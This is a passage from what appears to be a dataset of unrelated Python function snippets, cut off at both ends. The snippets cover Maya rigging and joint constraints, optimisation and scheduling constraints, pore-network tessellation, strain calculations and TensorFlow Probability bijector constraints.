np.where(np.array(fittable_coeffs_labels) == 'fp')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = 0., 1.\n if 'a' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'a')\n ind = ind[0][0]\n bounds[0][ind]= 0.\n if 'inc' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'inc')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = 0., 180.\n if 'ecc' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'ecc')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = 0., 1.\n if 'w' in fittable_coeffs_labels:\n ind = np.where(np.array(fittable_coeffs_labels) == 'w')\n ind = ind[0][0]\n bounds[0][ind], bounds[1][ind] = 0., 180.\n\n if gaussian_priors:\n for param in prior_params:\n ind = np.where(np.array(fittable_coeffs_labels) == param)[0][0]\n bounds[0][ind] = coeffs_dict[param] - coeffs_dict['{}_err'.format(param)]\n bounds[1][ind] = coeffs_dict[param] + coeffs_dict['{}_err'.format(param)]\n\n return bounds", "def soft_selection_to_joint(*args):\n# TODO - check for selection of verts!\n selVtx = cmds.ls(sl=True, fl=True) # to get center for joint\n vtxs, wts = rig.get_soft_selection() # to get weights for jnt\n\n tform = vtxs[0].partition(\".\")[0]\n mesh = cmds.listRelatives(tform, s=True)[0]\n ptOnSurface = cmds.checkBoxGrp(widgets[\"jntCPOMCBG\"], q=True, v1=True)\n auto = cmds.checkBoxGrp(widgets[\"jntAutoCBG\"], q=True, v1=True)\n jntName = cmds.textFieldGrp(widgets[\"jntNameTFG\"], q=True, tx=True)\n rotOnSurface = cmds.checkBoxGrp(widgets[\"jntRotCBG\"], q=True, v1=True)\n\n cls = mel.eval(\"findRelatedSkinCluster \" + tform)\n if not cls:\n if auto:\n baseJnt, cls = rig.new_joint_bind_at_center(tform)\n else:\n cmds.warning(\"There isn't an initial bind on this geometry. 
Either create one or check 'auto'\")\n return()\n\n center = rig.average_point_positions(selVtx)\n rot = (0,0,0)\n if ptOnSurface:\n center = rig.closest_pt_on_mesh_position(center, mesh)\n if rotOnSurface:\n rot = rig.closest_pt_on_mesh_rotation(center, mesh)\n\n cmds.select(cl=True)\n jnt = cmds.joint(name = jntName)\n cmds.xform(jnt, ws=True, t=center)\n cmds.xform(jnt, ws=True, ro=rot)\n\n # add influence to skin Cluster\n cmds.select(tform, r=True)\n cmds.skinCluster(e=True, ai=jnt, wt=0)\n\n # apply weights to that joint\n for v in range(len(vtxs)):\n cmds.skinPercent(cls, vtxs[v], transformValue=[jnt, wts[v]])\n\n newName = rig.increment_name(jntName)\n cmds.textFieldGrp(widgets[\"jntNameTFG\"], tx=newName, e=True)\n\n return(jnt)", "def build_rig(self):\n\n # create rig part top nodes\n self.create_part_master()\n\n # Get all the relevant part info\n prefix = self.prefix\n options = self.options\n anim_ctrls = self.anim_ctrls\n bind_jnts = self.bind_joints\n hooks = self.hooks\n ctrl_grps = self.ctrl_grps\n jnt_grps = self.jnt_grps\n\n mirror = self.mirror_value\n\n parent = options.get('parent')\n squash_stretch = options.get('squashStretch')\n aimDownBone = options.get('aimDownBone')\n single_joint = options.get('singleJoint')\n number_joints = options.get('numberJoints')\n pickWalk_parent = options.get('pickWalkParent')\n\n # Create ctrls\n zeros, ctrls, offsets, last_nodes = [], [], [], []\n\n for i, ctrl_name in enumerate(anim_ctrls):\n zero, ctrl, offCtrls, last_node = self.anim_ctrl(ctrl_name)\n zeros.append(zero)\n ctrls.append(ctrl)\n offsets.append(offCtrls)\n last_nodes.append(last_node)\n\n #Setup pickwaliking attributes for the fingers\n i = 0\n ctrls.reverse()\n for ctrl in ctrls:\n\n if i+1 < len(ctrls):\n\n pickWalk.attribute_tag(ctrls[i],ctrls[i+1])\n else:\n pickWalk.attribute_tag(ctrls[i],pickWalk_parent)\n break\n\n i+=1\n ctrls.reverse()\n\n if len(ctrls) > 1:\n for i in range(1, len(ctrls), 1):\n mc.parent(zeros[i], last_nodes[i-1])\n\n # constraint jnts\n if len(bind_jnts) > 2:\n\n # point and aim/orient contraint all joints down the chain based on the\n for i in range(len(last_nodes)-1):\n mc.pointConstraint(last_nodes[i], bind_jnts[i], mo=1, n=bind_jnts[i]+'_pc')\n if not squash_stretch:\n mc.scaleConstraint(last_nodes[i], bind_jnts[i], mo=1, n=bind_jnts[i]+'_sc')\n\n if i < len(last_nodes)-1:\n print aimDownBone\n if aimDownBone:\n mc.aimConstraint(last_nodes[i+1],\n bind_jnts[i],\n aim=[mirror,0,0],\n u=[0,1,0],\n wu=[0,1,0],\n wut='objectRotation',\n wuo=last_nodes[i],\n mo=1, n=bind_jnts[i]+'_ac')\n if aimDownBone == False:\n mc.orientConstraint(last_nodes[i],bind_jnts[i],n=bind_jnts[i]+'_oc')\n\n #parent constrain the last joint ot the last ctrl\n # mc.parentConstraint(last_nodes[-1], bind_jnts[-2], mo=1, n=bind_jnts[-2]+'_prc')\n # mc.parentConstraint(last_nodes[-1], bind_jnts[-1], mo=1, n=bind_jnts[-1]+'_prc')\n\n # if not squash_stretch:\n # mc.scaleConstraint(last_nodes[-1], bind_jnts[-2], mo=1, n=bind_jnts[-2]+'_sc')\n # mc.scaleConstraint(last_nodes[-1], bind_jnts[-1], mo=1, n=bind_jnts[-1]+'_sc')\n\n elif single_joint or number_joints == 1:\n mc.parentConstraint(last_nodes[0], bind_jnts[0], mo=1, n=bind_jnts[0]+'_prc')\n mc.scaleConstraint(last_nodes[0], bind_jnts[0], mo=1, n=bind_jnts[0]+'_sc')\n\n else:\n if squash_stretch:\n spline.preserve_volume(ctrls, bind_jnts[:-1], ctrls[0], attrs=['sy','sz'])\n\n mc.parentConstraint(bind_jnts[-2], bind_jnts[-1], mo=1, n=bind_jnts[-1]+'_prc')\n mc.scaleConstraint(bind_jnts[-2], bind_jnts[-1], mo=1, 
n=bind_jnts[-1]+'_sc')\n\n mc.parent(zeros[0], ctrl_grps[0])\n mc.parent(bind_jnts, jnt_grps[0])\n\n if not single_joint and number_joints == 1:\n mc.parent(bind_jnts[-1], bind_jnts[0])\n\n #utils.create_cfx_curves(self.bind_joints, self.prefix+'_'+self.part_type)\n\n if len(ctrls) > 1:\n spaces.tag(ctrls, arg='partParent:'+self.options.get('parent'))\n else:\n spaces.tag(ctrls)\n\n self.finalize_part()", "def solve(num_wizards, num_constraints, wizards, constraints): \n global wiz_const\n wiz_const = mapConstraints(wizards, constraints)\n partial_soltns = []\n\n # counter for priority queue since it doesn't allow \n # identical priorities\n k = 0\n\n # list of wizards sorted by lowest to highest degree\n sorted_wiz = sortWizByConsts(wiz_const)\n wiz_rankings = {wiz: i for i, wiz in enumerate(sorted_wiz)}\n\n const_set = set(map(tuple, constraints))\n for i in range(4) : \n heapq.heappush(partial_soltns, (0, k, nx.DiGraph(), const_set.copy()))\n k += 1\n\n print(\"setup done, commencing solving\")\n\n while len(partial_soltns) : \n\n # for partial_soltn, const_set in partial_soltns : \n# partial_soltns.remove(partial_soltn)\n num_seen, _, partial_soltn, const_set = heapq.heappop(partial_soltns)\n const = findNextConst(partial_soltn, const_set, wiz_rankings)\n print(\"seen \" + str(len(partial_soltn)) + \"\\t num partial_solutions\\t\" + str(len(partial_soltns)))\n try : \n const_set.remove(const)\n except KeyError : \n print(\"BAD SHIT\")\n pass\n possible_arrangements = [(const[0], const[1], const[2]),\n (const[2], const[0], const[1]), \n (const[2], const[1], const[0]),\n (const[1], const[0], const[2])]\n for arr in possible_arrangements:\n soltn = partial_soltn.copy()\n a, b, c = arr\n if not (soltn.has_node(a) and soltn.has_node(b) and nx.has_path(soltn, a, b)) : \n soltn.add_edge(a, b)\n if not (soltn.has_node(b) and soltn.has_node(c) and nx.has_path(soltn, b, c)) : \n soltn.add_edge(b, c)\n # see if we violated any other constraints (seen or not seen)\n is_valid, num_wiz = validNumWiz(soltn, const_set)\n\n if is_valid and len(list(nx.simple_cycles(soltn))) == 0 :\n heapq.heappush(partial_soltns, (-len(soltn), k, soltn, const_set.copy()))\n k += 1\n # are we done?\n if num_wiz == num_wizards :\n print(\"FINAL SOLUTION (found without processing all constraints but validating against them)\")\n ordering = list(nx.topological_sort(soltn))\n finishEverything(ordering, constraints)\n return ordering\n if foundCompleteOrdering(heapq.heappop(partial_soltns)) : \n print(\"FINAL SOLUTION\")\n ordering = list(nx.topological_sort(soltn))\n finishEverything(ordering, constraints)\n return ordering\n print(\"NO SOLUTION FOUND\")\n return \"\"", "def pointConstraint(*args, layer: AnyStr=\"\", maintainOffset: bool=True, name: Union[AnyStr,\n bool]=\"\", offset: Union[List[float, float, float], bool]=None, remove:\n bool=True, skip: Union[AnyStr, List[AnyStr]]=\"\", targetList: bool=True,\n weight: Union[float, bool]=0.0, weightAliasList: bool=True, q=True,\n query=True, e=True, edit=True, **kwargs)->Union[List[AnyStr], Any]:\n pass", "def _generate_throats(self):\n logger.info(\"Define connections between pores\")\n #Np = self._Np\n pts = self['pore.coords']\n Np = len(pts)\n #Generate 6 dummy domains to pad onto each face of real domain\n #This prevents surface pores from making long range connections to each other\n\n x,y,z = self[\"pore.coords\"].T\n if x.max() > self._Lx:\n Lx = x.max()*1.05\n else:\n Lx = self._Lx\n if y.max() > self._Ly:\n Ly = y.max()*1.05\n else:\n Ly = self._Ly\n if z.max() 
> self._Lz:\n Lz = z.max()*1.05\n else:\n Lz = self._Lz\n\n #Reflect in X = Lx and 0\n Pxp = pts.copy()\n Pxp[:,0]=(2*Lx-Pxp[:,0])\n Pxm= pts.copy()\n Pxm[:,0] = Pxm[:,0]*(-1)\n #Reflect in Y = Ly and 0\n Pyp = pts.copy()\n Pyp[:,1]=(2*Ly-Pxp[:,1])\n Pym = pts.copy()\n Pym[:,1] = Pxm[:,1]*(-1)\n #Reflect in Z = Lz and 0\n Pzp = pts.copy()\n Pzp[:,2]=(2*Lz-Pxp[:,2])\n Pzm = pts.copy()\n Pzm[:,2] = Pxm[:,2]*(-1)\n #Add dummy domains to real domain\n pts = np.vstack((pts,Pxp,Pxm,Pyp,Pym,Pzp,Pzm)) #Order important for boundary logic\n #Perform tessellation\n logger.debug(\"Beginning tessellation\")\n Tri = sptl.Delaunay(pts)\n logger.debug(\"Converting tessellation to adjacency matrix\")\n adjmat = sprs.lil_matrix((Np,Np),dtype=int)\n for i in sp.arange(0,sp.shape(Tri.simplices)[0]):\n #Keep only simplices that are fully in real domain\n #this used to be vectorize, but it stopped working...change in scipy?\n for j in Tri.simplices[i]:\n if j < Np:\n adjmat[j,Tri.simplices[i][Tri.simplices[i]<Np]] = 1\n #Remove duplicate (lower triangle) and self connections (diagonal)\n #and convert to coo\n adjmat = sprs.triu(adjmat,k=1,format=\"coo\")\n logger.debug(\"Conversion to adjacency matrix complete\")\n self['throat.conns']=sp.vstack((adjmat.row, adjmat.col)).T\n self['pore.all'] = np.ones(len(self['pore.coords']), dtype=bool)\n self['throat.all'] = np.ones(len(self['throat.conns']), dtype=bool)\n\n # Do Voronoi diagram - creating voronoi polyhedra around each pore and save vertex information\n self._vor = Voronoi(pts)\n all_vert_index = sp.ndarray(Np,dtype=object)\n for i,polygon in enumerate(self._vor.point_region[0:Np]):\n if -1 not in self._vor.regions[polygon]:\n all_vert_index[i]=dict(zip(self._vor.regions[polygon],self._vor.vertices[self._vor.regions[polygon]]))\n\n \" Add throat vertices by looking up vor.ridge_dict \"\n throat_verts = sp.ndarray(len(self[\"throat.conns\"]),dtype=object)\n for i,(p1,p2) in enumerate(self[\"throat.conns\"]):\n try:\n throat_verts[i]=dict(zip(self._vor.ridge_dict[(p1,p2)],self._vor.vertices[self._vor.ridge_dict[(p1,p2)]]))\n except KeyError:\n try:\n throat_verts[i]=dict(zip(self._vor.ridge_dict[(p2,p1)],self._vor.vertices[self._vor.ridge_dict[(p2,p1)]]))\n except KeyError:\n print(\"Throat Pair Not Found in Voronoi Ridge Dictionary\")\n\n self['pore.vert_index']=all_vert_index\n self['throat.vert_index']=throat_verts\n logger.debug(sys._getframe().f_code.co_name+\": End of method\")", "def constraint(self, item, handle, glue_item):\n start = MatrixProjection(self.start, glue_item.matrix_i2c)\n end = MatrixProjection(self.end, glue_item.matrix_i2c)\n point = MatrixProjection(handle.pos, item.matrix_i2c)\n\n cx = EqualsConstraint(point.x, start.x)\n cy = BetweenConstraint(point.y, start.y, end.y)\n\n return MultiConstraint(start, end, point, cx, cy)", "def getStrain(self, idx = None, strain = \"eps_mas\", base_1 = None, base_2 = None):\n\n \"\"\"Check if strain keyword is supported\"\"\"\n strain_avail = [\"eps_11\", \"eps_22\", \"eps_12\", \"eps_mas\", \"array\"]\n if strain.lower() not in strain_avail:\n string = \"Unrecognized strain argument: %s\" % strain\n ut.infoPrint(string)\n return\n\n \"\"\"Set some defaults\"\"\"\n if idx is None: idx = np.arange(self.atoms.shape[0])\n if isinstance(idx, (int, np.integer)): idx = [idx]\n\n if base_1 is None and base_2 is None:\n \"\"\"Send back the original strains as specified\"\"\"\n if strain.lower() == \"eps_11\":\n return self.eps_11[idx]\n elif strain.lower() == \"eps_22\":\n return self.eps_22[idx]\n elif 
strain.lower() == \"eps_12\":\n return self.eps_12[idx]\n elif strain.lower() == \"eps_mas\":\n return self.eps_mas[idx]\n elif strain.lower() == \"array\":\n \"\"\"Return (3,N) array with [[eps_11],[eps_22],[eps_12]]\"\"\"\n return np.vstack((self.eps_11[idx],\\\n self.eps_22[idx],\\\n self.eps_12[idx]))\n\n else:\n \"\"\"Calculate new cell vectors baded on the supplied base and the \n existing repetitions of that base\"\"\"\n\n \"\"\"Change the bottom cell vectors to match the new base\"\"\"\n if base_1 is not None:\n if isinstance(base_1, (int, np.integer)): \n base_1 = self.alt_base[base_1]\n A = np.matmul(base_1[:2, :2], self.rep_1[idx, :, :])\n else:\n A = self.cell_1[idx, :, :]\n if base_2 is not None:\n if isinstance(base_2, (int, np.integer)): \n base_2 = self.alt_base[base_2]\n B = np.matmul(base_2[:2, :2], self.rep_2[idx, :, :])\n else:\n B = self.cell_2[idx, :, :]\n\n \"\"\"Get the new strains\"\"\"\n eps_11, eps_22, eps_12, eps_mas = ut.calcStrains(a = A, b = B)\n\n if strain.lower() == \"eps_11\":\n return eps_11\n elif strain.lower() == \"eps_22\":\n return eps_22\n elif strain.lower() == \"eps_12\":\n return eps_12\n elif strain.lower() == \"eps_mas\":\n return eps_mas\n elif strain.lower() == \"array\":\n \"\"\"Return (3,N) array with [[eps_11],[eps_22],[eps_12]]\"\"\"\n return np.vstack((eps_11, eps_22, eps_12))", "def add_student_schedule_constraints_v2(solver, objective, courses, enroll_d, sched_d):\n assert SOLVER_VERSION == 2\n # enroll_d is a dictionary from frozen set of canonical course\n # names (i.e., courses taken in a term) to ints (counting how many\n # students had that set of courses)\n\n # find popular pairs of courses\n pair_count = { }\n for fs in enroll_d:\n ls = sorted(list(fs))\n for i in range(len(ls)):\n for j in range(i+1,len(ls)):\n if ls[i] not in courses and ls[j] not in courses:\n # both are cambridge courses\n continue\n \n p = frozenset((ls[i],ls[j]))\n if p not in pair_count:\n pair_count[p] = enroll_d[fs]\n else:\n pair_count[p] += enroll_d[fs]\n\n count = 0\n for p in sorted(pair_count.keys(), key=lambda k: -pair_count[k]):\n if count > PARAMS['MAX_COURSE_PAIRS']:\n break\n\n count += 1\n (cn1, cn2) = p\n # add constraints for course pair\n if cn1 not in courses:\n (cn1, cn2) = (cn2, cn1)\n\n # cn1 (and maybe cn2) are Allston courses\n assert cn1 in courses\n\n print(\"Processing course pair %s and %s, weight %s\"%(cn1,cn2,pair_count[p]))\n \n for mt1 in courses[cn1].vars_meeting_time:\n if cn2 in courses:\n for mt2 in courses[cn2].vars_meeting_time:\n dist = ss.distance_between_meeting_times(mt1, mt2)\n if dist == 0:\n # Hmmm, we probably don't want these in the same slot, but we will let the conflicts constraints handle it\n continue\n\n # !@! 
try this out, try to vary it\n if dist in [1,2] and {2,3} != {s[1] for s in mt1+mt2}:\n # Adjacent (or almost adjacent) and not blocking lunch (slots 2 and 3 in Allston)\n v = solver.IntVar(0, 1, \"%s,%s in %s and %s\"%(cn1,cn2,mt1,mt2))\n makeConjunction(solver, v, [courses[cn1].vars_meeting_time[mt1],courses[cn2].vars_meeting_time[mt2]])\n weight = PARAMS['WEIGHT_COMMON_COURSE_PAIR_ADJACENT_IN_ALLSTON'] if dist == 1 else PARAMS['WEIGHT_COMMON_COURSE_PAIR_ALMOST_ADJACENT_IN_ALLSTON']\n objective.SetCoefficient(v, weight * pair_count[p])\n\n else:\n assert cn2 in sched_d\n # give a bonus if mt1 is all on different days to cn2\n cts = sched_d[cn2]\n days_intersect = False\n for ind in [ss.DAYS_OF_WEEK.index(s[0]) for s in mt1]:\n for ct in cts:\n if ct.days[ind]:\n days_intersect = True\n break\n\n if not days_intersect:\n objective.SetCoefficient(courses[cn1].vars_meeting_time[mt1], PARAMS['WEIGHT_COMMON_COURSE_PAIR_DIFF_CAMPUS_DIFF_DAYS'] * pair_count[p])", "def __init__(self, center, leads, connections):\n\n if not center.is_square():\n raise ValueError(\"Center is not a square TightBinding\")\n\n self.center = center.copy()\n self.dims = center.dims\n self.leads = []\n self.connections = []\n\n for l,c in zip(leads,connections):\n self.append_lead(l,c)", "def _semiconnected_ramps(slope1=1., slope2=1.) -> cs.Network:\n\n class _Ramp(cs.Simulator):\n \"\"\"Used in tests to mock a simulator\"\"\"\n def __init__(self, slope: Fraction, step_size: Fraction):\n self._step_size = step_size\n self._x = Fraction(0)\n self._slope = slope\n\n @property\n def inputs(self):\n return {'u': sdf.InputPort(float, 1)}\n\n @property\n def outputs(self):\n return {'y': sdf.OutputPort(float, 1)}\n\n def calculate(self, input_tokens):\n self._x += self._slope * self._step_size\n return {'y': [float(self._x)]}\n\n def construct_ramp1(step_size):\n return _Ramp(slope1, step_size)\n\n def construct_ramp2(step_size):\n return _Ramp(slope2, step_size)\n\n slaves = {'Ramp1': construct_ramp1, 'Ramp2': construct_ramp2}\n\n connections = {\n cs.Dst('Ramp1', 'u'): cs.Src('Ramp2', 'y'),\n cs.Dst('Ramp2', 'u'): cs.Src('Ramp1', 'y'),\n }\n return slaves, connections", "def setUp(params, spec):\n\n if not params['fkSkeleton']:\n joints = []\n\n for x in range(params['numberOfSegments']):\n jnt = cmds.createNode('joint')\n jnt = cmds.rename(jnt, '{baseName}{index}_{JNT}'.format(baseName=spec.name, index=x, JNT=JNT)).split('|')[-1]\n if x > 0:\n cmds.parent(jnt, joints[x - 1])\n cmds.setAttr('{node}.translateY'.format(node=jnt), 1.0)\n joints.append(jnt)\n\n spec.params()['fkSkeleton'] = dragonfly.node.dfNode.fromList(joints)\n\n if not params['fkControls']:\n controls = []\n\n for x in range(params['fkNumberOfSegments']):\n ctl = cmds.curve(**CONTROL_SHAPE_DATA)\n cmds.controller(ctl)\n ctl = cmds.rename(ctl, '{baseName}{index}_{CTL}'.format(baseName=spec.name, index=x, CTL=CTL))\n match_nodes(params['fkSkeleton'][x].name(), ctl)\n if x > 0:\n cmds.parent(ctl, controls[x-1])\n controls.append(ctl)\n\n spec.params()['fkControls'] = dragonfly.node.dfNode.fromList(controls)", "def propose_patch(self, weight_bounds, learn_rate=1.0):\n in_dims, mid_dims, _, _ = weight_bounds.shape\n\n best_index = (None, None)\n best_constraints = -1\n best_delta = 0.0\n indices = itertools.product(range(in_dims), range(mid_dims))\n for in_dim, mid_dim in tqdm(indices, total=(in_dims * mid_dims),\n desc=\"Computing Patch\"):\n bounds = weight_bounds[in_dim, mid_dim, :, :]\n # We focus on the bounds that are non-NaN\n non_nan_bounds = 
bounds[~np.isnan(bounds[:, 0])]\n if len(non_nan_bounds) < best_constraints:\n continue\n lower, upper, n_met = self.interval_MAX_SMT(non_nan_bounds)\n\n if n_met <= best_constraints:\n continue\n best_constraints = n_met\n best_index = (in_dim, mid_dim)\n\n if lower <= 0.0 <= upper:\n best_delta = 0.0\n else:\n # True if the interval suggests to increase the weight.\n is_increase = lower > 0.0\n # If the interval suggests to increase the weight, suggest a\n # delta slightly above lower. Otherwise, suggest one slightly\n # below upper. Either way, we're trying to stay as close to 0\n # as possible.\n ratio = 0.1 if is_increase else 0.9\n best_delta = lower + (ratio * (upper - lower))\n if not np.isfinite(best_delta):\n eps = 0.1\n if is_increase: # => upper == np.Infinity\n assert np.isfinite(lower + eps)\n best_delta = lower + eps\n elif upper < 0.0: # => lower == -np.Infinity\n assert np.isfinite(upper - eps)\n best_delta = upper - eps\n else:\n assert False\n assert np.isfinite(best_delta)\n print(\"Would be satisfying\", best_constraints, \"constraints.\")\n print(\"Updating weight\", best_index)\n best_delta *= learn_rate\n return best_index, best_delta, best_constraints", "def doSetup(baseName, numberTwistJoints, knee, hip, pelvis, hipAimAxis, hipFrontAxis, pelvisAimAxis, pelvisFrontAxis):\n\ttry:\n\t\t# validate baseName\n\t\tutils.dg.validateNodeName(baseName)\n\t\t\n\t\t# validate incoming object names\n\t\tutils.dg.verifyNode(knee)\n\t\tutils.dg.verifyNode(hip)\n\t\tutils.dg.verifyNode(pelvis)\n\t\t\n\t\t# get the translation value for the knee\n\t\tkneeTranslate = cmds.getAttr('%s.translate'%knee)[0]\n\t\t\n\t\t# see if there is a side label\n\t\tbodySide = cmds.getAttr('%s.side'%hip)\n\t\t\n\t\t# find out what rotate order the hip is using\n\t\trotateOrder = cmds.getAttr('%s.rotateOrder'%hip)\n\t\t\n\t\t# create the twist joints\n\t\ttwistJoints = []\n\t\t\n\t\tfor i in range(numberTwistJoints):\n\t\t\tcmds.select(cl=True)\n\t\t\tnewJoint = cmds.joint(name='%s%s'%(baseName, i + 1))\n\t\t\t\n\t\t\t# set up the first joint\n\t\t\tif i == 0:\n\t\t\t\tnewJoint = cmds.parent(newJoint, hip)[0]\n\t\t\t\tjointRadius = 1.0\n\t\t\t\tjointOrient = []\n\t\t\t\tif cmds.objectType(hip, isType='joint'):\n\t\t\t\t\tjointRadius = cmds.getAttr('%s.radius'%hip) * 0.5\n\t\n\t\t\t\tcmds.setAttr('%s.radius'%newJoint, jointRadius)\n\t\t\t\tcmds.setAttr('%s.jointOrient'%newJoint, 0,0,0)\n\t\t\t\tcmds.setAttr('%s.translate'%newJoint, 0,0,0)\n\t\t\t\t\n\t\t\t\t# create the hip constraint\n\t\t\t\tcmds.am_hipConstraint(\n\t\t\t\t\tnewJoint,\n\t\t\t\t\tpelvisObject = pelvis,\n\t\t\t\t\thipObject = hip,\n\t\t\t\t\tha=hipAimAxis, \n\t\t\t\t\thf=hipFrontAxis, \n\t\t\t\t\tpa=pelvisAimAxis, \n\t\t\t\t\tpf=pelvisFrontAxis)\n\t\t\t# set up the rest of the joints\n\t\t\telse:\n\t\t\t\tnewJoint = cmds.parent(newJoint, hip)[0]\n\t\t\t\tcmds.setAttr('%s.radius'%newJoint, jointRadius)\n\t\t\t\tcmds.setAttr('%s.jointOrient'%newJoint, 0,0,0)\n\t\t\t\tpct = float(i)/float(numberTwistJoints)\n\t\t\t\tcmds.setAttr('%s.translate'%newJoint, kneeTranslate[0]*pct, kneeTranslate[1]*pct, kneeTranslate[2]*pct)\n\t\t\t\t\n\t\t\t\t# create the orient constraint\n\t\t\t\torientConstraint = cmds.orientConstraint([twistJoints[0], hip, newJoint])\n\t\t\t\ttargetWeights = cmds.orientConstraint(q=True, weightAliasList=True)\n\t\t\t\tcmds.setAttr('%s.%s'%(orientConstraint[0], targetWeights[0]), numberTwistJoints - i)\n\t\t\t\tcmds.setAttr('%s.%s'%(orientConstraint[0], targetWeights[1]), 
i)\n\t\t\t\tcmds.setAttr('%s.interpType'%orientConstraint[0], 1)\n\t\t\t\t\n\t\t\t# set label and rotate order\n\t\t\tcmds.setAttr('%s.side'%newJoint, bodySide)\n\t\t\tcmds.setAttr('%s.type'%newJoint, 18)\n\t\t\tcmds.setAttr('%s.otherType'%newJoint, 'Hip Twist %s'%(i + 1), type='string')\n\t\t\tcmds.setAttr('%s.rotateOrder'%newJoint, rotateOrder)\n\t\t\t\n\t\t\t# add the new joint to the list to return\n\t\t\ttwistJoints.append(newJoint)\n\t\t\n\t\treturn twistJoints\n\texcept: raise", "def __init__(self, nodes=\"default\", scale=0.12, enlarge=True, **kwargs):\n super().__init__(**kwargs)\n\n # joints' weight for penalty\n self._nodes = convex_nodes[nodes]\n self._scale = scale\n self._enlarge = enlarge", "def boundary_cond_dirichtlet(matriz,Tx1,Tx2,Ty1,Ty2):\n matriz[-1,:] = Tx2\n matriz[:,0] = Ty1\n matriz[:,-1] = Ty2\n matriz[0,:] = Tx1\n return matriz", "def _create_constraints(\n\t\tself,\n\t\tvariables,\n\t\tnutrients,\n\t\tfood_items,\n\t\texpressions):\n\t\tconstraints = []\n\n\t\t# Iterate all nutrients to create constraints\n\t\tfor nutrient_id, nutrient_data in nutrients.items():\n\n\t\t\tmax_nutrient_amount_constraint = pulp.LpConstraint(\n\t\t\t\te=expressions[self.NUTRIENTS_QTY_EXPRESSIONS_CATEGORY][nutrient_id],\n\t\t\t\tsense=pulp.LpConstraintLE,\n\t\t\t\trhs=nutrient_data[\"constraints\"][\"max\"],\n\t\t\t\tname= '_'.join([nutrient_id, \"max\"]))\n\t\t\tconstraints.append(max_nutrient_amount_constraint)\n\n\t\t\tmin_nutrient_amount_constraint = pulp.LpConstraint(\n\t\t\t\te=expressions[self.NUTRIENTS_QTY_EXPRESSIONS_CATEGORY][nutrient_id],\n\t\t\t\tsense=pulp.LpConstraintGE,\n\t\t\t\trhs=nutrient_data[\"constraints\"][\"min\"],\n\t\t\t\tname='_'.join([nutrient_id, \"min\"]))\n\t\t\tconstraints.append(min_nutrient_amount_constraint)\n\n\t\t\t# Demerits constrain => use max(of deviation)\n\t\t\tif self.use_demerits:\n\t\t\t\t# Nutrient variation\n\t\t\t\tnutrient_demerits_variable = variables['nutrient_demerit'][nutrient_id]\n\t\t\t\t\n\t\t\t\tnutrient_deviation_constraint = pulp.LpConstraint(\n\t\t\t\t\te=nutrient_demerits_variable - (expressions[self.NUTRIENTS_VARIATION_EXPRESSIONS_CATEGORY][nutrient_id] * nutrient_data[\"weights\"][\"overconsumption\"]),\n\t\t\t\t\tsense=pulp.LpConstraintGE,\n\t\t\t\t\trhs= 0.,\n\t\t\t\t\tname='_'.join([nutrient_id, \"dev\"]))\n\t\t\t\tconstraints.append(nutrient_deviation_constraint)\n\t\t\t\t\t\t\t\t \t\t\t\t\t\t\t\n\t\t\t\tnutrient_deviation_ve_constraint = pulp.LpConstraint(\n\t\t\t\t\te=nutrient_demerits_variable - (-expressions[self.NUTRIENTS_VARIATION_EXPRESSIONS_CATEGORY][nutrient_id] * nutrient_data[\"weights\"][\"overconsumption\"]),\n\t\t\t\t\tsense=pulp.LpConstraintGE,\n\t\t\t\t\trhs= 0.,\n\t\t\t\t\tname='_'.join([nutrient_id, \"dev_ve\"]))\n\t\t\t\tconstraints.append(nutrient_deviation_ve_constraint)\n\n\t\treturn constraints", "def joint_pairs(self):\n return [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14], [15, 16], #17 body keypoints\n [20-3, 23-3], [21-3, 24-3], [22-3, 25-3], [26-3, 42-3], [27-3, 41-3], [28-3, 40-3], [29-3, 39-3], [30-3, 38-3], \n [31-3, 37-3], [32-3, 36-3], [33-3, 35-3], [43-3, 52-3], [44-3, 51-3], [45-3, 50-3], [46-3, 49-3], [47-3, 48-3], \n [62-3, 71-3], [63-3, 70-3], [64-3, 69-3], [65-3, 68-3], [66-3, 73-3], [67-3, 72-3], [57-3, 61-3], [58-3, 60-3],\n [74-3, 80-3], [75-3, 79-3], [76-3, 78-3], [87-3, 89-3], [93-3, 91-3], [86-3, 90-3], [85-3, 81-3], [84-3, 82-3],\n [94-3, 115-3], [95-3, 116-3], [96-3, 117-3], [97-3, 118-3], [98-3, 119-3], [99-3, 120-3], [100-3, 121-3],\n [101-3, 122-3], 
[102-3, 123-3], [103-3, 124-3], [104-3, 125-3], [105-3, 126-3], [106-3, 127-3], [107-3, 128-3],\n [108-3, 129-3], [109-3, 130-3], [110-3, 131-3], [111-3, 132-3], [112-3, 133-3], [113-3, 134-3], [114-3, 135-3]]", "def test_loc_tech_carriers_ramping_constraint(self):\n m = build_model({}, \"simple_supply,two_hours,investment_costs\")\n m.run(build_only=True)\n assert not hasattr(m._backend_model, \"ramping_up_constraint\")\n assert not hasattr(m._backend_model, \"ramping_down_constraint\")\n\n m = build_model(\n {\"techs.test_supply_elec.constraints.energy_ramping\": 0.1},\n \"simple_supply,two_hours,investment_costs\",\n )\n m.run(build_only=True)\n assert hasattr(m._backend_model, \"ramping_up_constraint\")\n assert hasattr(m._backend_model, \"ramping_down_constraint\")\n\n m = build_model(\n {\"techs.test_conversion.constraints.energy_ramping\": 0.1},\n \"simple_conversion,two_hours,investment_costs\",\n )\n m.run(build_only=True)\n assert hasattr(m._backend_model, \"ramping_up_constraint\")\n assert hasattr(m._backend_model, \"ramping_down_constraint\")", "def constraint_for(dist=None, param=None):\n\n constraints = {\n 'atol':\n tfb.Softplus(),\n 'rtol':\n tfb.Softplus(),\n 'concentration':\n tfb.Softplus(),\n 'GeneralizedPareto.concentration': # Permits +ve and -ve concentrations.\n lambda x: tf.math.tanh(x) * 0.24,\n 'concentration0':\n tfb.Softplus(),\n 'concentration1':\n tfb.Softplus(),\n 'df':\n tfb.Softplus(),\n 'InverseGaussian.loc':\n tfb.Softplus(),\n 'JohnsonSU.tailweight':\n tfb.Softplus(),\n 'PowerSpherical.mean_direction':\n lambda x: tf.math.l2_normalize(tf.math.sigmoid(x) + 1e-6, -1),\n 'ContinuousBernoulli.probs':\n tfb.Sigmoid(),\n 'Geometric.logits': # TODO(b/128410109): re-enable down to -50\n 